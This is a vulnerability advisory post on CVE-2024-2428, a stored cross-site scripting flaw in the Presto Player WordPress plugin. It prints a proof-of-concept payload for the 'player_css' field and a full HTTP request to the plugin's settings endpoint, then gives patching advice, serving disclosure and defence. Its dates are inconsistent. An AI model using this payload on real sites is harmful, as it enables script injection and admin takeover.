A critical security flaw has been uncovered in “The Ultimate Video Player For WordPress – by Presto Player” plugin, tagged as CVE-2024-2428. This vulnerability jeopardizes over 100,000 WordPress installations, enabling attackers to execute Stored Cross-Site Scripting (XSS) attacks, potentially leading to Admin Account Creation.

Main info:

CVECVE-2024-2428
PluginThe Ultimate Video Player For WordPress – by Presto Player < 2.2.3
CriticalHigh
All Time1 797 539
Active installations100 000+
Publicly PublishedMarch 15, 2023
Last UpdatedMarch 15, 2023
ResearcherDmtirii Ignatyev
OWASP TOP-10A7: Cross-Site Scripting (XSS)
PoCYes
ExploitNo
Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2428
https://wpscan.com/vulnerability/4832e223-4571-4b45-97db-2fd403797c49/
Plugin Security Certification by CleanTalk

Timeline

March 4, 2023Plugin testing and vulnerability detection in the The Ultimate Video Player For WordPress – by Presto Player have been completed
March 4, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
March 15, 2024Registered CVE-2024-2428

Discovery of the Vulnerability

During routine plugin testing, security researchers stumbled upon a significant vulnerability within the plugin’s functionality. This flaw allows attackers to inject malicious JavaScript code, paving the way for unauthorized account takeovers.

Understanding of Stored XSS attack’s

Stored XSS is a prevalent attack vector where malicious scripts are injected into a web application’s database. When the compromised data is retrieved and rendered, the injected script executes in the victim’s browser context. Real-world examples demonstrate how attackers leverage this vulnerability to hijack user sessions, deface websites, or launch more sophisticated attacks.

Exploiting the Stored XSS Vulnerability

To exploit CVE-2024-2428, attackers can manipulate the “player_css” field in the plugin’s settings with crafted JavaScript payloads. Once executed, these scripts can initiate actions within the admin interface, potentially leading to the creation of unauthorized admin accounts.

POC:

Go to “Add New Post” and try to change filed “player_css” to this – 123″asdasd=” onmouseover=’alert(1)’ P.S. you should go to page with any players

Requests:

POST /wordpress/index.php/wp-json/presto-player/v1/settings?_locale=user HTTP/1.1 

Host: 127.0.0.1 

User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0 

Accept: application/json, */*;q=0.1 

Accept-Language: en-US,en;q=0.5 

Accept-Encoding: gzip, deflate 

X-WP-Nonce: 1713ddbbe0 

Content-Type: application/json 

Origin: http://127.0.0.1 

Content-Length: 116 

DNT: 1 

Connection: close 

Cookie: wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1709575790%7C7NrVNWbsp3b6AEj5va22HZWBn4nNcpQ9XzW09wokBFn%7Ce26eb708b0c24aa6fb0a7136de79e4a857038e3a320aa4bdfcd3fea3d4e30089; wp-settings-time-2=1709403214 

Sec-Fetch-Dest: empty 

Sec-Fetch-Mode: cors 

Sec-Fetch-Site: same-origin 

{"presto_player_branding":{"logo":"","color":"#000000","logo_width":150,"player_css":"123\"onmouseover='alert(1)'"}}

___

The ramifications of this vulnerability are severe. Attackers could compromise website integrity, harvest sensitive data, or distribute malware. Furthermore, unauthorized admin account creation could grant attackers full control over affected WordPress installations, enabling them to carry out malicious activities undetected.

Recommendations for Improved Security

Website administrators are strongly urged to update “The Ultimate Video Player For WordPress” plugin to the latest patched version immediately. Additionally, regular security audits and monitoring mechanisms should be in place to detect and mitigate potential vulnerabilities promptly. Lastly, enforcing secure coding practices and implementing robust input validation mechanisms can help thwart similar attacks in the future. Stay vigilant and prioritize website security!

By taking proactive measures to address Stored XSS vulnerabilities like CVE-2024-2428, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.

#WordPressSecurity #StoredXSS #WebsiteSafety #StayProtected #HighVulnerability

Use CleanTalk solutions to improve the security of your website

DMITRII I.
CVE-2024-2428 – The Ultimate Video Player For WordPress – by Presto Player – Stored XSS to Admin Account Creation (Contributor+) – POC

Create your CleanTalk account



By signing up, you agree with license. Have an account? Log in.


Leave a Reply

Your email address will not be published. Required fields are marked *